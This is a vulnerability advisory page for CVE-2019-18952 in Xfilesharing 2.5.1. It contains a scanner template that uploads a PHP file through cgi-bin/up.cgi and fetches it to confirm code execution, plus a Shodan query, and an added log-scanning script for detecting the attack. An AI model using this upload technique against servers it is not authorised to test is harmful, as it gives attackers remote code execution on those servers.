CVE-2019-18952: Xfilesharing 2.5.1 - Arbitrary File Upload

Date: 2025-08-01 | Affected software: Xfilesharing 2.5.1 | PoC: Public

Vulnerability description

SibSoft Xfilesharing through 2.5.1 allows arbitrary file upload via cgi-bin/up.cgi. This can be combined with CVE-2019-18951 to achieve remote code execution via a .html file, containing short codes, that is served over HTTP.

PoC code [public]

id: CVE-2019-18952

info:
  name: Xfilesharing 2.5.1 - Arbitrary File Upload
  author: daffainfo
  severity: critical
  description: |
    SibSoft Xfilesharing through 2.5.1 allows cgi-bin/up.cgi arbitrary file upload.This can be combined with CVE-2019-18951 to achieve remote code execution via a .html file, containing short codes, that is served over HTTP.
  impact:
    Attackers can upload malicious files and execute arbitrary code remotely, leading to full system compromise.
  reference:
    - https://www.exploit-db.com/exploits/47659
    - https://gist.github.com/pak0s/af9f640170aed335fdf6d110d468dbce
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-18952
    cwe-id: CWE-434
    epss-score: 0.84694
    epss-percentile: 0.99284
    cpe: cpe:2.3:a:sibsoft:xfilesharing:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sibsoft
    product: xfilesharing
    shodan-query: html:"/?op=registration" "OpenSSL"
  tags: cve,cve2019,sibsoft,xfilesharing,rce,file-upload,intrusive,vkev,vuln

flow: http(1) && http(2)

variables:
  num: "999999999"
  path: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /cgi-bin/up.cgi HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337

        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="sid"

        {{path}}
        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: application/php

        <?php
        echo md5('{{num}}');
        unlink(__FILE__);
        ?>
        -----------------------------5825462663702204104870787337--

    matchers:
      - type: word
        words:
          - "<OK>"
        internal: true

  - raw:
      - |
        GET /cgi-bin/temp/{{path}}/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "{{md5(num)}}"
# digest: 4a0a004730450221009597e421fd26f91dc9b04ce0a9f9ae5c3a0db17215b7bc67b2903be6e437777c022050a887da69c68745936a4c96e6d9f52336354422d2a84b32c76c0f6843854b67:922c64590222798bb761d5b6d8e72950
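
Detection side of the request pair above, as an added example that is not part of the original page or of the template author's code: it scans a web access log for a client that POSTs to /cgi-bin/up.cgi and later requests a script-like file under /cgi-bin/temp/<sid>/. The Combined Log Format, the extension list and the sample log lines are assumptions constructed for illustration; only the two paths come from the template.

```python
import re
from collections import defaultdict

# Assumed input: Combined Log Format -> ip - user [time] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_PATH = "/cgi-bin/up.cgi"
# Script-like file under the upload temp directory (layout taken from the template).
TEMP_SCRIPT_RE = re.compile(
    r'^/cgi-bin/temp/(?P<sid>[^/?]+)/(?P<name>[^/?]+\.(?:php\d?|phtml|cgi|pl|html?))(?:\?|$)',
    re.IGNORECASE,
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "POST /cgi-bin/up.cgi HTTP/1.1" 200 12 "-" "curl/8.0"',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /cgi-bin/temp/abcXYZ/qwert.php HTTP/1.1" 200 32 "-" "curl/8.0"',
    '198.51.100.4 - - [01/Aug/2025:10:05:00 +0000] "GET /cgi-bin/temp/abcXYZ/photo.jpg HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Aug/2025:10:06:00 +0000] "GET /cgi-bin/temp/zzz/a.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

def find_upload_then_fetch(lines):
    """Return one finding per request for a script-like temp file made by a
    client that had already POSTed to up.cgi earlier in the log."""
    uploads = defaultdict(int)  # client ip -> count of earlier upload POSTs
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path = m["path"]
        if m["method"] == "POST" and path.split("?", 1)[0] == UPLOAD_PATH:
            uploads[m["ip"]] += 1
            continue
        hit = TEMP_SCRIPT_RE.match(path)
        if hit and uploads[m["ip"]]:
            findings.append({
                "ip": m["ip"], "time": m["ts"], "sid": hit["sid"],
                "file": hit["name"], "served": m["status"] == "200",
            })
    return findings

if __name__ == "__main__":
    for finding in find_upload_then_fetch(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true means the server answered 200 for the uploaded file, which is the condition the template's second matcher depends on; a web server that neither executes nor serves files from the upload temp directory would not produce it.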